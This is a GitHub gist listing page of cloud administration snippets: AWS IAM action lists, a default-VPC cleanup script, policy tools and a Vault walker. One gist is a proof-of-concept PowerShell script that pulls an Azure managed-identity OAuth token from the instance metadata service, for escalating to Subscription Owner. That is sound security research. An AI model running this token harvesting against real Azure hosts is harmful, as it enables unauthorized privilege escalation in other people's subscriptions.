Skip to content

Instantly share code, notes, and snippets.

Avatar

Kinnaird McQuade kmcquade

View GitHub Profile
@iann0036
iann0036 / gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active Jun 16, 2021
List of expensive / long-term effect AWS IAM actions
View gist:b473bbb3097c5f4c656ed3d07b4d2222
route53domains:RegisterDomain
route53domains:RenewDomain
route53domains:TransferDomain
ec2:ModifyReservedInstances
ec2:PurchaseHostReservation
ec2:PurchaseReservedInstancesOffering
ec2:PurchaseScheduledInstances
rds:PurchaseReservedDBInstancesOffering
dynamodb:PurchaseReservedCapacityOfferings
s3:PutObjectRetention
@breser
breser / remove_unused_default_vpcs.sh
Last active Feb 19, 2021
remove_unused_default_vpcs.sh
View remove_unused_default_vpcs.sh
#!/bin/bash
# Delete Default VPCs
# Deletes Default VPCs across an entire organization if there are no ENIs in
# the default VPC.
#
# Assumes that ~/.aws/credentials has credentials to the root account for the
# AWS Organization. Assumes that the user/role you're logged into in the
# root account has permissions to assume the OrganizationAccountAccessRole in
# each member account. Requires jq and aws cli be installed on the path.
@kfosaaen
kfosaaen / MI-Owner-Escalation.ps1
Created Feb 14, 2020
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
View MI-Owner-Escalation.ps1
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
@patricksanders
patricksanders / summarize.py
Created Jan 31, 2020
Summarize IAM policy with policy_sentry
View summarize.py
import json
from policy_sentry.analysis.analyze import analyze_by_access_level, determine_actions_to_expand
from policy_sentry.shared.database import connect_db
DB_SESSION = connect_db('bundled') # Use the bundled data that comes with Policy Sentry
sample_policy = json.loads("""
{
"Statement":[
View aws_magic_ips.md

This is a list of all the magic IP addresses that are addressible in AWS.

IP Address Description
169.254.169.254 AWS Metadata Service
169.254.169.253 Alternate VPC DNS resolver
169.254.169.123 AWS Time Service
169.254.170.2 ECS Task Metadata
169.254.169.250 Windows Activation
169.254.169.251 Windows Activation
@jbriales
jbriales / jq.bash
Created Jun 23, 2019
Toy jq key autocompletion
View jq.bash
function jq() {
if [ -f $1 ]; then
FILE=$1; shift
# Move FILE at the end as expected by native jq
command jq "$@" "$FILE"
else
command jq "$@"
fi
}
View gist:489c188a154cb1074f724dec375318b2
a4b
account
acm
acm-pca
amplify
apigateway
application-autoscaling
appstream
appsync
artifact
@0xdabbad00
0xdabbad00 / resources_referenced_by_managed_policies.txt
Created Feb 10, 2019
AWS managed policies resource reference, found using https://github.com/SummitRoute/aws_managed_policies and: cat policies/* | jq '.PolicyVersion.Document.Statement[].Resource' | sed 's/ //' | sort | uniq
View resources_referenced_by_managed_policies.txt
"*"
"arn:*:iam::*:role/aws-service-role/s3.data-source.lustre.fsx.amazonaws.com/AWSServiceRoleForFSxS3Access_*"
"arn:aws:a4b:*:*:gateway/*"
"arn:aws:acm-pca:*:*:certificate-authority/*"
"arn:aws:acuity:*:*:stream/deeplens*/*"
"arn:aws:apigateway:*::/*"
"arn:aws:apigateway:*::/account",
"arn:aws:apigateway:*::/clientcertificates",
"arn:aws:apigateway:*::/clientcertificates/*",
"arn:aws:apigateway:*::/domainnames"
@mazenovi
mazenovi / vault-tree
Last active Mar 16, 2021
explore recursively your vault by HashiCorp
View vault-tree
#!/usr/bin/env bash
function walk() {
for secret in $(vault list $1 | tail -n +3)
do
if [[ ${secret} == *"/" ]] ; then
walk "${1}${secret}"
else
echo "${1}${secret}"
fi